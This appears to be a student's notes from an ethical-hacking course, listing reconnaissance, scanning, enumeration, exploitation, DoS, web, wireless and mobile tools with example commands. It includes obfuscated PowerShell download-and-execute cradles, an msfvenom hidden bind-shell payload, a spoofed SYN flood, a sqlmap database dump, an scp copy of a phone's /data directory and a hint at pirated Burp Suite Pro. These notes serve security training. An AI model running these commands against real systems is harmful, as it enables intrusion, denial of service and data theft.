:::info
These notes only record the "tools" the instructor demoed in class.
Built-in system commands and their operation are not recorded here.
Basic tools that everyone has used to death are not repeated here either.
:::

:::spoiler ls -al
[toc]
:::

# Reconnaissance Techniques

## footprinting reconnaissance

### [netcraft](https://sitereport.netcraft.com/?url=)

### **theHarvester**

```bash
# -l is the result limit (number of results to pull per source), not a port number
theHarvester -d DOMAIN_NAME -l LIMIT -b SEARCH_ENGINE
```

### [web history](https://archive.org/)

### **whois**

```bash
whois DOMAIN_NAME
```

### **traceroute**

```bash
traceroute DOMAIN_NAME
```

### **Recon-ng framework**

```bash
recon-ng
[recon-ng][default] > marketplace install all
```

Marketplace search:

```bash
[recon-ng][default] > marketplace search ssl
```

More info on a module:

```bash
[recon-ng][default] > marketplace info ssltools
```

Load a module:

```bash
[recon-ng][default] > modules load hackertarget
[recon-ng][default][hackertarget] >
```

Show the module's options:

```bash
[recon-ng][default][hackertarget] > show options
```

Set the source to the name of the domain:

```bash
[recon-ng][default][hackertarget] > options set SOURCE tesla.com
SOURCE => tesla.com
```

Use the `info` command; it shows that the current value has changed to tesla.com:

```bash
[recon-ng][default][hackertarget] > info
```

Use `input` to see what the module will consume:

```bash
[recon-ng][default][hackertarget] > input
```

Run the module:

```bash
[recon-ng][default][hackertarget] > run
```

Show the hosts collected so far:

```bash
[recon-ng][default][hackertarget] > show hosts
```

### **whatweb**

```bash
whatweb DOMAIN_NAME
```

### [OSINT map](https://osintframework.com/)

## scanning networks

### **hping3**

| Function | Command | Description |
|----------|---------|-------------|
| Ping-like | `hping3 -1 <target IP>` | Ping the target with ICMP echo requests. |
| SYN scan | `hping3 -S <target IP> -p <target port range>` | TCP SYN scan to check which ports are open. |
| Specify source IP | `hping3 -a <spoofed source IP> -S <target IP> -p <target port>` | Send SYN packets with a spoofed source IP address. |
| UDP scan | `hping3 -2 <target IP> -p <target port>` | Send UDP packets to the given port. |
| TRACEROUTE | `hping3 --traceroute -V -1 <target IP>` | Perform a `traceroute`-like operation. |
| Flood test | `hping3 -S <target IP> -p <target port> --flood` | Send a large volume of SYN packets to the target port as a flood test. |
| Packet size | `hping3 -S <target IP> -p <target port> -d <packet size>` | Set the packet data size in bytes. |
| Packet count | `hping3 -S <target IP> -p <target port> -c <count>` | Send the given number of packets. |
| Specific TCP flags | `hping3 -F -P -U <target IP> -p <target port>` | Send TCP packets with the FIN, PUSH and URG flags set. |

### **nmap**

| Nmap flag | Description |
|-----------|-------------|
| -sV | Service version detection; useful input for further vulnerability scanning. |
| -p <x> or -p- | Scan specific ports or all ports, to focus quickly on the target services. |
| -Pn | Use when the target host may block ping; skips host discovery so the port scan runs anyway. |
| -A | Comprehensive scan: OS detection, version detection and the default scripts; suited to a full assessment. |
| -sC | Run the default script set to pick up common vulnerabilities and configuration information; suited to a quick first assessment. |
| -v | Verbose output on the scan's progress; helps track progress and diagnose problems. |
| -sU | Scan UDP ports to identify less common services; suited to a thorough network assessment. |
| -sS | Half-open (SYN) scan, fast and relatively stealthy; suited to scanning many ports. |
| --top-ports <N> | Scan only the N most common ports, saving time while still getting the key information. |
| --script <script-name> | Run a specific Nmap script for a custom check of a particular vulnerability or configuration. |
| -oA <output-basename> | Save the results in all output formats (normal, XML, grepable) for later analysis and reporting. |
| -T4 | Faster timing template; suited to a LAN or when scan time is limited. |
| -D RND:(n) | Use n random decoy source IPs. |
| --spoof-mac 0 | Spoof the source MAC address (0 means a random one). |

## enumeration

### nmap as an all-purpose enumeration tool

```bash
# find the NSE scripts for the protocol being enumerated, then run one against the target
locate "*ENUM_PROTOCOL*.nse"
nmap --script=SCRIPT_NAME IP_ADDRESS
```

### snmp-check (port 161 open)

```bash
snmp-check DOMAIN_NAME
```

### smtp (port 25 open)

```bash
# assumed to be iSMTP (`ismtp`); the original wrote the command as `smtp`
# -f takes a file of SMTP server IPs, -h a single host, -e the user list to enumerate
ismtp -f smtp-ips.txt -e /usr/share/wordlists/metasploit/unix_users.txt
ismtp -h HOST -e /usr/share/wordlists/metasploit/unix_users.txt
```

### enum4linux (port 445 open)

```bash
enum4linux IP_ADDRESS
```

# System Hacking Phases and Attack Techniques

## vulnerability analysis

### [NVD](https://nvd.nist.gov/vuln/search)

### [CWE](https://cwe.mitre.org/)

### OpenVAS / GVM (software)

### nikto (for web "servers")

```bash
nikto -h IP_ADDRESS
```

## system hacking

### responder

```bash
responder -I eth0 -wrf
```

### msfvenom

```bash
msfvenom -p windows/shell_hidden_bind_tcp ahost=IP_ADDRESS lport=PORT_NUMBER -f exe > spy.exe
```

## malware threats

**obfuscation**

```
,;cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression(New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')&&echo,exit
```

```
C:\WINDOWS\system32\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')&&echo,exit
```

**analysis**

### [anyrun](https://any.run/)

### [virustotal](https://www.virustotal.com/gui/home/upload)

### [PeStudio](https://www.winitor.com/download)

### [Tcpview](https://learn.microsoft.com/zh-tw/sysinternals/downloads/tcpview)

# Network and Perimeter Hacking

## sniffing

**MAC Flooding**

### macof

```bash
sudo macof
```

## social engineering

### setoolkit

```bash
setoolkit
```

## denial-of-service

### hping3

```bash
hping3 --flood --rand-source -S -p 80 DOMAIN_NAME
```

### [LOIC](https://sourceforge.net/projects/loic/)

## session hijacking

### [hunt](https://packetstormsecurity.com/files/download/21968/hunt-1.5bin.tgz)

```bash
parrot@G:~/hunt-1.5$ sudo ./hunt
/*
 *	hunt 1.5
 *	multipurpose connection intruder / sniffer for Linux
 *	(c) 1998-2000 by kra
 */
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u)     host up tests
a)     arp/simple hijack (avoids ack storm if arp used)
s)     simple hijack
d)     daemons rst/arp/sniff/mac
o)     options
x)     exit
->
```

## evading IDS, firewalls and honeypots

Theory only, no hands-on.

# Web Application Hacking

## Hacking web server

### whatweb

```bash
whatweb -v DOMAIN_NAME
```

### netcat

```bash
# netcat needs a port to connect to
nc -vv DOMAIN_NAME PORT_NUMBER
```

### nikto

```bash
nikto -h DOMAIN_NAME
```

### gobuster

```bash
gobuster dir -u URL -w WORDLIST
```

## hacking web application

### wafw00f

```bash
wafw00f DOMAIN_NAME
```

**wordpress login attack**

### burpsuitepro

As for where the Pro version came from, heh! Security people can work that one out themselves 🙃

### msfconsole

```bash
msf6 auxiliary(scanner/http/wordpress_login_enum) > options

Module options (auxiliary/scanner/http/wordpress_login_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ANONYMOUS_LOGIN      false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE           true             yes       Perform brute force authentication
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING     none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   ENUMERATE_USERNAMES  true             yes       Enumerate usernames
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RANGE_END            10               no        Last user id to enumerate
   RANGE_START          1                no        First user id to enumerate
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                80               yes       The target port (TCP)
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TARGETURI            /                yes       The base path to the wordpress application
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VALIDATE_USERS       true             yes       Validate usernames
   VERBOSE              true             yes       Whether to print output for all attempts
   VHOST                                 no        HTTP server virtual host
```

## sql injection

### sqlmap

```bash
sqlmap -u URL --dbs
sqlmap -u URL -D DBNAME --tables
sqlmap -u URL -D DBNAME -T TBNAME --dump
```

# Wireless Network Hacking

## hacking wireless networks

### aircrack-ng

```bash
aircrack-ng FILE
```

```bash
aircrack-ng -w WORDLIST FILE
```

# Mobile Platform, IoT, and OT Hacking

## hacking mobile platforms

### adb

```bash
adb connect IP_ADDRESS:PORT_NUMBER
adb -s IP_ADDRESS:PORT_NUMBER shell
```

```bash
scp -r /data USER@IP_ADDRESS:/work
```

## IoT and OT hacking

Theory only.

# Cloud Computing

## cloud computing

Theory only.

# Cryptography

## cryptography

**one way hash**

```bash
echo 123 > file
sha1sum file
```
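As an added example that is not part of the original notes, the script below builds on the same `sha1sum` call to show what "one-way" buys you in practice: the fixed digest of `123`, the avalanche effect when a single byte changes, and a manifest check with `sha1sum -c` that catches the modification. It assumes GNU coreutils (`sha1sum`, `mktemp`) and constructs its sample files in a temporary directory.

```shell
#!/bin/sh
# Added example, not from the original notes. Assumes GNU coreutils (sha1sum, mktemp).
# Sample files are constructed in a temporary directory, so nothing outside it is touched.
set -eu

# Print only the hex digest (sha1sum prints "<digest>  <filename>").
digest_of() {
    sha1sum "$1" | cut -d' ' -f1
}

# The digest the notes' `echo 123 > file; sha1sum file` produces (echo appends a newline).
digest_of_123() {
    d=$(mktemp -d); printf '123\n' > "$d/file"
    digest_of "$d/file"
    rm -rf "$d"
}

# Number of positions at which two equal-length hex strings differ.
hex_diff_count() {
    n=0; i=1
    while [ "$i" -le "${#1}" ]; do
        [ "$(printf '%s' "$1" | cut -c"$i")" = "$(printf '%s' "$2" | cut -c"$i")" ] || n=$((n + 1))
        i=$((i + 1))
    done
    echo "$n"
}

# Avalanche effect: "123" and "124" differ in one byte, yet most hex digits of the digest change.
avalanche_diff() {
    d=$(mktemp -d); printf '123\n' > "$d/a"; printf '124\n' > "$d/b"
    hex_diff_count "$(digest_of "$d/a")" "$(digest_of "$d/b")"
    rm -rf "$d"
}

# Integrity check: store the digest in a manifest, verify, modify one byte, verify again.
# Returns "ok tampered": the untouched file passes, the modified one is rejected by sha1sum -c.
integrity_check() {
    d=$(mktemp -d); printf '123\n' > "$d/file"
    (cd "$d" && sha1sum file > file.sha1)
    (cd "$d" && sha1sum -c --quiet file.sha1 >/dev/null 2>&1) && r1=ok || r1=fail
    printf '124\n' > "$d/file"   # one-byte modification of the protected file
    (cd "$d" && sha1sum -c --quiet file.sha1 >/dev/null 2>&1) && r2=ok || r2=tampered
    rm -rf "$d"
    echo "$r1 $r2"
}

printf 'sha1 of "123\\n": %s\n' "$(digest_of_123)"
printf 'hex digits changed by a one-byte edit: %s of 40\n' "$(avalanche_diff)"
printf 'manifest check before/after edit: %s\n' "$(integrity_check)"
```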